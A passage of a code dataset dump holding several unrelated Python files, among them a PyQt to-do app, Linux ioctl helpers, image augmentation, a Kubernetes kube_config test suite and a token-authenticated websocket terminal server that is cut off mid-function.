add_task(self, task):\n if bool(task) != False:\n self.remaining_list.addItem(task)\n #\n\n def do_task(self):\n task = self.remaining_list.takeItem(self.remaining_list.currentRow())\n if bool(task) != False:\n self.finished_list.addItem(task.text())\n\n def undo_task(self):\n task = self.finished_list.takeItem(self.finished_list.currentRow())\n if bool(task) != False:\n self.remaining_list.addItem(task.text())\n\n def add_stuff(self):\n dlg = Dialog()\n dlg.ui.buttonBox.accepted.connect(\n lambda: self.add_task(dlg.ui.new_task_input.text())\n )\n dlg.exec()\n\n\napp = QApplication([])\nwindow = MainWindow()\nwindow.show()\napp.exec()\n","sub_path":"app (1).py","file_name":"app (1).py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522385286","text":"from programs.orthant_proba.model import standardized_Gamma_and_a, TruncatedGaussianSimulator, OrthantProbability, TemperedOrthantProbability\nimport numpy as np\nfrom programs.executor import smc_sampler_model_to_fk\n\ndef des_to_fk(des):\n Sigma = np.load(file='./programs/orthant_proba/data/Sigma_' + des.name + '.npy')\n a = np.load(file='./programs/orthant_proba/data/a_' + des.name + '.npy')\n Gamma, a = standardized_Gamma_and_a(Sigma,a)\n static_model = TruncatedGaussianSimulator()\n if not des.tempered:\n model = OrthantProbability(Gamma=Gamma, a=a, static_model=static_model)\n else:\n model = TemperedOrthantProbability(Gamma=Gamma, a=a, static_model=static_model)\n return smc_sampler_model_to_fk(des, model)","sub_path":"programs/orthant_proba/des_to_fk.py","file_name":"des_to_fk.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"539760720","text":"\"\"\"Linux API Access\n\nThis module provides access to linux system-calls and other APIs, in particular\nthose not provided by the python standard library. The idea is to provide\nuniversal wrappers with broad access to linux APIs. Convenience helpers and\nhigher-level abstractions are beyond the scope of this module.\n\nIn some cases it is overly complex to provide universal access to a specific\nAPI. Hence, the API might be restricted to a reduced subset of its\nfunctionality, just to make sure we can actually implement the wrappers in a\nreasonable manner.\n\"\"\"\n\n\nimport array\nimport fcntl\n\n\n__all__ = [\n \"ioctl_get_immutable\",\n \"ioctl_toggle_immutable\",\n]\n\n\n# NOTE: These are wrong on at least ALPHA and SPARC. They use different\n# ioctl number setups. We should fix this, but this is really awkward\n# in standard python.\n# Our tests will catch this, so we will not accidentally run into this\n# on those architectures.\nFS_IOC_GETFLAGS = 0x80086601\nFS_IOC_SETFLAGS = 0x40086602\n\nFS_IMMUTABLE_FL = 0x00000010\n\nBLK_IOC_FLSBUF = 0x00001261\n\n\ndef ioctl_get_immutable(fd: int):\n \"\"\"Query FS_IMMUTABLE_FL\n\n This queries the `FS_IMMUTABLE_FL` flag on a specified file.\n\n Arguments\n ---------\n fd\n File-descriptor to operate on.\n\n Returns\n -------\n bool\n Whether the `FS_IMMUTABLE_FL` flag is set or not.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError` will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError()\n\n flags = array.array('L', [0])\n fcntl.ioctl(fd, FS_IOC_GETFLAGS, flags, True)\n return bool(flags[0] & FS_IMMUTABLE_FL)\n\n\ndef ioctl_toggle_immutable(fd: int, set_to: bool):\n \"\"\"Toggle FS_IMMUTABLE_FL\n\n This toggles the `FS_IMMUTABLE_FL` flag on a specified file. It can both set\n and clear the flag.\n\n Arguments\n ---------\n fd\n File-descriptor to operate on.\n set_to\n Whether to set the `FS_IMMUTABLE_FL` flag or not.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError` will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError()\n\n flags = array.array('L', [0])\n fcntl.ioctl(fd, FS_IOC_GETFLAGS, flags, True)\n if set_to:\n flags[0] |= FS_IMMUTABLE_FL\n else:\n flags[0] &= ~FS_IMMUTABLE_FL\n fcntl.ioctl(fd, FS_IOC_SETFLAGS, flags, False)\n\n\ndef ioctl_blockdev_flushbuf(fd: int):\n \"\"\"Flush the block device buffer cache\n\n NB: This function needs the `CAP_SYS_ADMIN` capability.\n\n Arguments\n ---------\n fd\n File-descriptor of a block device to operate on.\n\n Raises\n ------\n OSError\n If the underlying ioctl fails, a matching `OSError`\n will be raised.\n \"\"\"\n\n if not isinstance(fd, int) or fd < 0:\n raise ValueError(f\"Invalid file descriptor: '{fd}'\")\n\n fcntl.ioctl(fd, BLK_IOC_FLSBUF, 0)\n","sub_path":"osbuild/util/linux.py","file_name":"linux.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176539661","text":"class Library:\r\n\tdef registration(self):\r\n\t\tprint(\"welcome to registration\")\r\n\tdef searchbook(self,bookid):\r\n\t\tprint(\"hai hello\")\r\n\t\tif bookid>=20:\r\n\t\t\tprint(\"book is available\")\r\n\t\telse:\r\n\t\t\tprint(\"book is not available\")\r\n\tdef searchuser(self):\r\n\t\tn=int(input(\"enter a your number\"))\r\n\t\tif(n==9448708768):\r\n\t\t\tprint(\"user found\")\r\n\t\telse:\r\n\t\t\tprint(\"user not found\")\r\nclass Digitallibrary:\r\n\tdef scanqrcode(self):\r\n\t\tprint(\"qr code\")\t\t\r\n\t\t\r\nlourdlibrary=Library()\r\nlourdlibrary.registration()\r\nlourdlibrary.searchbook(25)\r\nlourdlibrary.searchuser()\r\n\r\ndiglib=Digitallibrary()\r\ndiglib.scanqrcode()\t","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"214556645","text":"import numpy as np\nimport cv2\nfrom skimage.transform import rotate\nfrom skimage.transform import warp\nfrom skimage.transform import ProjectiveTransform\nfrom numpy import random\n\ndef single_image_augmentation(img, intensity, label):\n\n img = rotate_img(img, intensity)\n img = projective_transform(img, intensity)\n\n return img, label\n\ndef rotate_img(img, intensity):\n delta = 30. * intensity \n img = rotate(img, random.uniform(-delta, delta), mode='edge')\n return img\n\ndef projective_transform(img, intensity):\n image_x_size = img.shape[0]\n image_y_size = img.shape[1]\n\n dx = image_x_size * 0.3 * intensity\n dy = image_y_size * 0.3 * intensity\n\n tl_top = random.uniform(-dy, dy)\n tl_left = random.uniform(-dx, dx)\n bl_bottom = random.uniform(-dy, dy)\n bl_left = random.uniform(-dx, dx)\n tr_top = random.uniform(-dy, dy)\n tr_right = random.uniform(-dx, dx)\n br_bottom = random.uniform(-dy, dy)\n br_right = random.uniform(-dx, dx)\n\n transform = ProjectiveTransform()\n \n transform.estimate(\n np.array((\n (tl_left, tl_top),\n (bl_left, image_x_size - bl_bottom),\n (image_y_size - br_right, image_x_size - br_bottom),\n (image_y_size - tr_right, tr_top))),\n np.array((\n (0, 0),\n (0, image_x_size),\n (image_y_size, image_x_size),\n (image_y_size, 0)))) \n\n img = warp(img, transform, mode='edge')\n img = (img * 255).astype(np.uint8)\n return img\n\nfrom joblib import Parallel, delayed\n \ndef parallel_test(X_train, y_train, target):\n \n labels, counts = np.unique(y_train, return_counts=True)\n \n X_aug = []\n y_aug = []\n \n for label, count in zip(labels, counts):\n augmentation_num = target - count\n X_train_label = X_train[y_train == label]\n\n parallel_res = Parallel(n_jobs=4)(delayed(single_image_augmentation)(X_train_label[np.random.randint(count)], 0.75, label=label) for i in range(augmentation_num))\n\n print(parallel_res)\n print(len(parallel_res))","sub_path":"code/parallel_data_augmentation.py","file_name":"parallel_data_augmentation.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25485240","text":"import requests\nfrom lxml import etree\nimport time\n\nurl = 'http://news.szhome.com/tags/278.html'\ndata = requests.get(url).text\ns=etree.HTML(data)\n#第一条数据\nitems = s.xpath('//*[@id=\"divList\"]/div')\ntime.sleep(1)\n\nsoures = []\nfor item in items:\n soure = item.xpath('./div/div[1]/a/text()')[0]\n soures.append(soure)\n# print(soures)\n \n# 最新的一条数据 \nnewItem = soures[0]\n\n\n#原始数据\n# sourcePrice = item.xpath('./div/div[1]/a/text()')[0]\n# print(sourcePrice)\ndateIndex = newItem.find('日')\n#截取出日期\ndate = newItem[0:(dateIndex+1)]\n\nnumIndex_p = newItem.find('成交')\nnumIndex_e = newItem.find('套')\nnum = newItem[numIndex_p+2:numIndex_e]\n\nprice_p = newItem.find('均价')\nprice_e = newItem.find('元')\nprice = newItem[price_p+2:price_e]\n\nprint(\"今天:{}\\t成交:{}\\t均价:{}\".format(date,num,price))\n\n","sub_path":"Python/爬虫/DEMO/深圳房价【xpath】/today_house_price.py","file_name":"today_house_price.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14404964","text":"# Copyright 2016 The Kubernetes Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport base64\nimport os\nimport tempfile\nimport unittest\n\nfrom .config_exception import ConfigException\nfrom .kube_config import (ConfigNode, FileOrData, KubeConfigLoader,\n _create_temp_file_with_content)\n\n\ndef _base64(string):\n return base64.encodestring(string.encode()).decode()\n\n\nTEST_FILE_KEY = \"file\"\nTEST_DATA_KEY = \"data\"\nTEST_FILENAME = \"test-filename\"\n\nTEST_DATA = \"test-data\"\nTEST_DATA_BASE64 = _base64(TEST_DATA)\n\nTEST_ANOTHER_DATA = \"another-test-data\"\nTEST_ANOTHER_DATA_BASE64 = _base64(TEST_ANOTHER_DATA)\n\nTEST_HOST = \"test-host\"\nTEST_USERNAME = \"me\"\nTEST_PASSWORD = \"pass\"\n# token for me:pass\nTEST_BASIC_TOKEN = \"Basic bWU6cGFzcw==\"\n\nTEST_SSL_HOST = \"https://test-host\"\nTEST_CERTIFICATE_AUTH = \"cert-auth\"\nTEST_CERTIFICATE_AUTH_BASE64 = _base64(TEST_CERTIFICATE_AUTH)\nTEST_CLIENT_KEY = \"client-key\"\nTEST_CLIENT_KEY_BASE64 = _base64(TEST_CLIENT_KEY)\nTEST_CLIENT_CERT = \"client-cert\"\nTEST_CLIENT_CERT_BASE64 = _base64(TEST_CLIENT_CERT)\n\n\nclass BaseTestCase(unittest.TestCase):\n\n def setUp(self):\n self._temp_files = []\n\n def tearDown(self):\n for f in self._temp_files:\n os.remove(f)\n\n def _create_temp_file(self, content=\"\"):\n handler, name = tempfile.mkstemp()\n self._temp_files.append(name)\n os.write(handler, str.encode(content))\n os.close(handler)\n return name\n\n\nclass TestFileOrData(BaseTestCase):\n\n @staticmethod\n def get_file_content(filename):\n with open(filename) as f:\n return f.read()\n\n def test_file_given_file(self):\n obj = {TEST_FILE_KEY: TEST_FILENAME}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY)\n self.assertEqual(TEST_FILENAME, t.as_file())\n\n def test_file_given_data(self):\n obj = {TEST_DATA_KEY: TEST_DATA_BASE64}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA, self.get_file_content(t.as_file()))\n\n def test_data_given_data(self):\n obj = {TEST_DATA_KEY: TEST_DATA_BASE64}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_data_given_file(self):\n obj = {\n TEST_FILE_KEY: self._create_temp_file(content=TEST_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY)\n self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_data_given_file_and_data(self):\n obj = {\n TEST_DATA_KEY: TEST_DATA_BASE64,\n TEST_FILE_KEY: self._create_temp_file(\n content=TEST_ANOTHER_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA_BASE64, t.as_data())\n\n def test_file_given_file_and_data(self):\n obj = {\n TEST_DATA_KEY: TEST_DATA_BASE64,\n TEST_FILE_KEY: self._create_temp_file(\n content=TEST_ANOTHER_DATA)}\n t = FileOrData(obj=obj, file_key_name=TEST_FILE_KEY,\n data_key_name=TEST_DATA_KEY)\n self.assertEqual(TEST_DATA, self.get_file_content(t.as_file()))\n\n def test_create_temp_file_with_content(self):\n self.assertEqual(TEST_DATA,\n self.get_file_content(\n _create_temp_file_with_content(TEST_DATA)))\n\n\nclass TestConfigNode(BaseTestCase):\n\n test_obj = {\"key1\": \"test\", \"key2\": [\"a\", \"b\", \"c\"],\n \"key3\": {\"inner_key\": \"inner_value\"},\n \"with_names\": [{\"name\": \"test_name\", \"value\": \"test_value\"},\n {\"name\": \"test_name2\",\n \"value\": {\"key1\", \"test\"}},\n {\"name\": \"test_name3\", \"value\": [1, 2, 3]}]}\n\n def setUp(self):\n super(TestConfigNode, self).setUp()\n self.node = ConfigNode(\"test_obj\", self.test_obj)\n\n def test_normal_map_array_operations(self):\n self.assertEqual(\"test\", self.node['key1'])\n self.assertEqual(4, len(self.node))\n\n self.assertEqual(\"test_obj/key2\", self.node['key2'].name)\n self.assertEqual([\"a\", \"b\", \"c\"], self.node['key2'].value)\n self.assertEqual(\"b\", self.node['key2'][1])\n self.assertEqual(3, len(self.node['key2']))\n\n self.assertEqual(\"test_obj/key3\", self.node['key3'].name)\n self.assertEqual({\"inner_key\": \"inner_value\"}, self.node['key3'].value)\n self.assertEqual(\"inner_value\", self.node['key3'][\"inner_key\"])\n self.assertEqual(1, len(self.node['key3']))\n\n def test_get_with_name(self):\n node = self.node[\"with_names\"]\n self.assertEqual(\n \"test_value\",\n node.get_with_name(\"test_name\")[\"value\"])\n self.assertTrue(\n isinstance(node.get_with_name(\"test_name2\"), ConfigNode))\n self.assertTrue(\n isinstance(node.get_with_name(\"test_name3\"), ConfigNode))\n self.assertEqual(\"test_obj/with_names[name=test_name2]\",\n node.get_with_name(\"test_name2\").name)\n self.assertEqual(\"test_obj/with_names[name=test_name3]\",\n node.get_with_name(\"test_name3\").name)\n\n def expect_exception(self, func, message_part):\n with self.assertRaises(ConfigException) as context:\n func()\n self.assertIn(message_part, str(context.exception))\n\n def test_key_does_not_exists(self):\n self.expect_exception(lambda: self.node['not-exists-key'],\n \"Expected key not-exists-key in test_obj\")\n self.expect_exception(lambda: self.node['key3']['not-exists-key'],\n \"Expected key not-exists-key in test_obj/key3\")\n\n def test_get_with_name_on_invalid_object(self):\n self.expect_exception(\n lambda: self.node['key2'].get_with_name('no-name'),\n \"Expected all values in test_obj/key2 list to have \\'name\\' key\")\n\n def test_get_with_name_on_non_list_object(self):\n self.expect_exception(\n lambda: self.node['key3'].get_with_name('no-name'),\n \"Expected test_obj/key3 to be a list\")\n\n def test_get_with_name_on_name_does_not_exists(self):\n self.expect_exception(\n lambda: self.node['with_names'].get_with_name('no-name'),\n \"Expected object with name no-name in test_obj/with_names list\")\n\n\nclass FakeConfig:\n\n FILE_KEYS = [\"ssl_ca_cert\", \"key_file\", \"cert_file\"]\n\n def __init__(self, token=None, **kwargs):\n self.api_key = {}\n if token:\n self.api_key['authorization'] = token\n\n self.__dict__.update(kwargs)\n\n def __eq__(self, other):\n if len(self.__dict__) != len(other.__dict__):\n return\n for k, v in self.__dict__.items():\n if k not in other.__dict__:\n return\n if k in self.FILE_KEYS:\n try:\n with open(v) as f1, open(other.__dict__[k]) as f2:\n if f1.read() != f2.read():\n return\n except IOError:\n # fall back to only compare filenames in case we are\n # testing the passing of filenames to the config\n if other.__dict__[k] != v:\n return\n else:\n if other.__dict__[k] != v:\n return\n return True\n\n def __repr__(self):\n rep = \"\\n\"\n for k, v in self.__dict__.items():\n val = v\n if k in self.FILE_KEYS:\n try:\n with open(v) as f:\n val = \"FILE: %s\" % str.decode(f.read())\n except IOError as e:\n val = \"ERROR: %s\" % str(e)\n rep += \"\\t%s: %s\\n\" % (k, val)\n return \"Config(%s\\n)\" % rep\n\n\nclass TestKubeConfigLoader(BaseTestCase):\n TEST_KUBE_CONFIG = {\n \"current-context\": \"no_user\",\n \"contexts\": [\n {\n \"name\": \"no_user\",\n \"context\": {\n \"cluster\": \"default\"\n }\n },\n {\n \"name\": \"simple_token\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"simple_token\"\n }\n },\n {\n \"name\": \"gcp\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"gcp\"\n }\n },\n {\n \"name\": \"user_pass\",\n \"context\": {\n \"cluster\": \"default\",\n \"user\": \"user_pass\"\n }\n },\n {\n \"name\": \"ssl\",\n \"context\": {\n \"cluster\": \"ssl\",\n \"user\": \"ssl\"\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"context\": {\n \"cluster\": \"ssl-no_file\",\n \"user\": \"ssl-no_file\"\n }\n },\n ],\n \"clusters\": [\n {\n \"name\": \"default\",\n \"cluster\": {\n \"server\": TEST_HOST\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"cluster\": {\n \"server\": TEST_SSL_HOST,\n \"certificate-authority\": TEST_CERTIFICATE_AUTH,\n }\n },\n {\n \"name\": \"ssl\",\n \"cluster\": {\n \"server\": TEST_SSL_HOST,\n \"certificate-authority-data\": TEST_CERTIFICATE_AUTH_BASE64,\n }\n },\n ],\n \"users\": [\n {\n \"name\": \"simple_token\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"gcp\",\n \"user\": {\n \"auth-provider\": {\n \"name\": \"gcp\",\n \"access_token\": \"not_used\",\n },\n \"token\": TEST_DATA_BASE64, # should be ignored\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"user_pass\",\n \"user\": {\n \"username\": TEST_USERNAME, # should be ignored\n \"password\": TEST_PASSWORD, # should be ignored\n }\n },\n {\n \"name\": \"ssl-no_file\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"client-certificate\": TEST_CLIENT_CERT,\n \"client-key\": TEST_CLIENT_KEY,\n }\n },\n {\n \"name\": \"ssl\",\n \"user\": {\n \"token\": TEST_DATA_BASE64,\n \"client-certificate-data\": TEST_CLIENT_CERT_BASE64,\n \"client-key-data\": TEST_CLIENT_KEY_BASE64,\n }\n },\n ]\n }\n\n def test_no_user_context(self):\n expected = FakeConfig(host=TEST_HOST)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"no_user\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_simple_token(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_DATA_BASE64)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"simple_token\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_user_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"simple_token\")\n self.assertTrue(loader._load_user_token())\n self.assertEqual(TEST_DATA_BASE64, loader.token)\n\n def test_gcp(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_ANOTHER_DATA_BASE64)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"gcp\",\n client_configuration=actual,\n get_google_credentials=lambda: TEST_ANOTHER_DATA_BASE64) \\\n .load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_gcp_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"gcp\",\n get_google_credentials=lambda: TEST_ANOTHER_DATA_BASE64)\n self.assertTrue(loader._load_gcp_token())\n self.assertEqual(TEST_ANOTHER_DATA_BASE64, loader.token)\n\n def test_user_pass(self):\n expected = FakeConfig(host=TEST_HOST, token=TEST_BASIC_TOKEN)\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"user_pass\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_load_user_pass_token(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"user_pass\")\n self.assertTrue(loader._load_user_pass_token())\n self.assertEqual(TEST_BASIC_TOKEN, loader.token)\n\n def test_ssl_no_cert_files(self):\n expected = FakeConfig(\n host=TEST_SSL_HOST,\n token=TEST_DATA_BASE64,\n cert_file=TEST_CLIENT_CERT,\n key_file=TEST_CLIENT_KEY,\n ssl_ca_cert=TEST_CERTIFICATE_AUTH\n )\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"ssl-no_file\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_ssl(self):\n expected = FakeConfig(\n host=TEST_SSL_HOST,\n token=TEST_DATA_BASE64,\n cert_file=self._create_temp_file(TEST_CLIENT_CERT),\n key_file=self._create_temp_file(TEST_CLIENT_KEY),\n ssl_ca_cert=self._create_temp_file(TEST_CERTIFICATE_AUTH)\n )\n actual = FakeConfig()\n KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"ssl\",\n client_configuration=actual).load_and_set()\n self.assertEqual(expected, actual)\n\n def test_list_contexts(self):\n loader = KubeConfigLoader(\n config_dict=self.TEST_KUBE_CONFIG,\n active_context=\"no_user\")\n actual_contexts = loader.list_contexts()\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n for actual in actual_contexts:\n expected = expected_contexts.get_with_name(actual['name'])\n self.assertEqual(expected.value, actual)\n\n def test_current_context(self):\n loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG)\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n self.assertEqual(expected_contexts.get_with_name(\"no_user\").value,\n loader.current_context)\n\n def test_set_active_context(self):\n loader = KubeConfigLoader(config_dict=self.TEST_KUBE_CONFIG)\n loader.set_active_context(\"ssl\")\n expected_contexts = ConfigNode(\"\", self.TEST_KUBE_CONFIG)['contexts']\n self.assertEqual(expected_contexts.get_with_name(\"ssl\").value,\n loader.current_context)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kubernetes/config/kube_config_test.py","file_name":"kube_config_test.py","file_ext":"py","file_size_in_byte":16570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182692946","text":"import random\n\nAnswer = random.randint(1, 20)\nnum_tries = 4\n\nguess = -1\ntries = 0\n\nwhile guess != Answer and tries < num_tries:\n guess = int(int(input(f\"기회가 {num_tries - tries}번 남았습니다. 1-20 사이의 숫자를 맞춰 보세요:\")))\n tries += 1\n\n if Answer > guess:\n print(\"Up\")\n elif Answer < guess:\n print(\"Down\")\n\nif guess == Answer and tries < num_tries:\n print(f\"축하합니다 {num_tries}번 만에 숫자를 맞추셨습니다\")\nelse:\n print(f\"아쉽습니다. 정답은{Answer}\")\n\n\n","sub_path":"codeit/python/quiz/num_game_sim/codeit_num_game.py","file_name":"codeit_num_game.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173412852","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nimport sys\nimport time\nimport uuid\n\nimport tornado.web\nimport tornado.websocket\n\nfrom . import proto, shell, utils, workspace\n\n\n@utils.Singleton\nclass ShellSessionManager(object):\n def __init__(self):\n self._sessions = {}\n asyncio.ensure_future(self.check_session_task())\n\n async def check_session_task(self):\n while True:\n for session in self._sessions:\n timeout, shell, timestamp = self._sessions[session]\n if timestamp and time.time() >= timestamp + timeout:\n # Clean session\n shell.exit()\n self._sessions.pop(session)\n break\n await asyncio.sleep(1)\n\n def create_session(self, shell, timeout):\n session_id = str(uuid.uuid4())\n self._sessions[session_id] = [timeout, shell, 0]\n return session_id\n\n def get_session(self, session_id):\n session = self._sessions.get(session_id)\n if session:\n return session[1]\n return None\n\n def update_session_time(self, session_id, timestamp):\n session = self._sessions.get(session_id)\n assert session != None\n session[2] = timestamp\n\n\nclass WebSocketProtocol(tornado.websocket.WebSocketProtocol13):\n async def accept_connection(self, handler):\n if self.handler.check_permission():\n await super(WebSocketProtocol, self).accept_connection(handler)\n else:\n handler.set_status(403)\n log_msg = \"Authorization Failed\"\n handler.finish(log_msg)\n\n\nclass WSTerminalServerHandler(tornado.websocket.WebSocketHandler):\n \"\"\"Websocket Terminal Server Handler\"\"\"\n\n token = None\n\n def __init__(self, *args, **kwargs):\n super(WSTerminalServerHandler, self).__init__(*args, **kwargs)\n self._buffer = b\"\"\n self._workspace = None\n self._shell = None\n self._session_id = None\n self._sequence = 0x10000\n\n def check_permission(self):\n if self.token:\n auth = self.request.headers.get(\"Authorization\", \"\")\n if auth.startswith(\"Token \"):\n return auth.split()[-1].strip() == self.token\n else:\n return False\n return True\n\n def get_websocket_protocol(self):\n \"\"\"Override to connect target server\"\"\"\n websocket_version = self.request.headers.get(\"Sec-WebSocket-Version\")\n if websocket_version in (\"7\", \"8\", \"13\"):\n params = tornado.websocket._WebSocketParams(\n ping_interval=self.ping_interval,\n ping_timeout=self.ping_timeout,\n max_message_size=self.max_message_size,\n compression_options=self.get_compression_options(),\n )\n return WebSocketProtocol(self, mask_outgoing=True, params=params)\n\n async def on_message(self, message):\n self._buffer += message\n packet, self._buffer = proto.TransportPacket.deserialize(self._buffer)\n if packet:\n try:\n await self.handle_request(packet.message)\n except Exception as ex:\n utils.logger.exception(\"Handle request %s failed\" % packet.message)\n await self.send_response(packet.message, -1, str(ex))\n\n async def send_request(self, command, **kwargs):\n self._sequence += 1\n data = {\n \"command\": command,\n \"type\": proto.EnumPacketType.REQUEST,\n \"id\": self._sequence,\n }\n data.update(kwargs)\n packet = proto.TransportPacket(data)\n return await self.write_message(packet.serialize(), True)\n\n async def send_response(self, request, code=0, message=None, **kwargs):\n data = {\n \"command\": request[\"command\"],\n \"type\": proto.EnumPacketType.RESPONSE,\n \"id\": request[\"id\"],\n \"code\": code,\n \"message\": message or \"\",\n }\n data.update(kwargs)\n packet = proto.TransportPacket(data)\n return await self.write_message(packet.serialize(), True)\n\n async def handle_request(self, request):\n utils.logger.debug(\n \"[%s][Request][%d][%s] %s\"\n % (\n self.__class__.__name__,\n request.get(\"id\", 0),\n request.get(\"command\"),\n str(request)[:200],\n )\n )\n if request[\"command\"] == proto.EnumCommand.SYNC_WORKSPACE:\n worksapce_id = request[\"workspace\"]\n workspace_path = os.path.join(\n os.environ.get(\"WSTERM_WORKSPACE\", os.environ.get(\"TEMP\", \"/tmp\")),\n worksapce_id,\n )\n self._workspace = workspace.Workspace(workspace_path)\n data = self._workspace.snapshot()\n await self.send_response(\n request, data=data,\n )\n elif self._workspace and request[\"command\"] == proto.EnumCommand.WRITE_FILE:\n utils.logger.info(\n \"[%s] Update file %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.write_file(\n request[\"path\"], request[\"data\"], request[\"overwrite\"]\n )\n elif self._workspace and request[\"command\"] == proto.EnumCommand.REMOVE_FILE:\n utils.logger.info(\n \"[%s] Remove file %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.remove_file(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.CREATE_DIR:\n utils.logger.info(\n \"[%s] Create directory %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.create_directory(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.REMOVE_DIR:\n utils.logger.info(\n \"[%s] Remove directory %s\" % (self.__class__.__name__, request[\"path\"])\n )\n self._workspace.remove_directory(request[\"path\"])\n elif self._workspace and request[\"command\"] == proto.EnumCommand.MOVE_ITEM:\n utils.logger.info(\n \"[%s] Move item %s to %s\"\n % (self.__class__.__name__, request[\"src_path\"], request[\"dst_path\"])\n )\n self._workspace.move_item(request[\"src_path\"], request[\"dst_path\"])\n elif request[\"command\"] == proto.EnumCommand.CREATE_SHELL:\n session_id = request.get(\"session\")\n session_timeout = request.get(\"timeout\")\n utils.logger.info(\n \"[%s] Create shell (%d, %d)\"\n % (self.__class__.__name__, *request[\"size\"])\n )\n\n ssm = ShellSessionManager()\n if self._shell:\n await self.send_response(request, code=-1, message=\"Shell is created\")\n else:\n if session_id:\n shell = ssm.get_session(session_id)\n if not shell:\n await self.send_response(\n request,\n code=-1,\n message=\"Shell session %s not found\" % session_id,\n )\n return\n utils.logger.info(\n \"[%s] Use Cached shell session %s\"\n % (self.__class__.__name__, session_id)\n )\n self._session_id = session_id\n self._shell = shell\n ssm.update_session_time(session_id, 0) # Avoid cleaned\n asyncio.ensure_future(self.forward_shell())\n await self.send_response(request, platform=sys.platform)\n else:\n shell_workspace = os.getcwd()\n if self._workspace:\n shell_workspace = self._workspace.path\n asyncio.ensure_future(\n self.spawn_shell(shell_workspace, request[\"size\"])\n )\n time0 = time.time()\n while time.time() - time0 < 5:\n if self._shell:\n break\n await asyncio.sleep(0.005)\n else:\n await self.send_response(\n request, 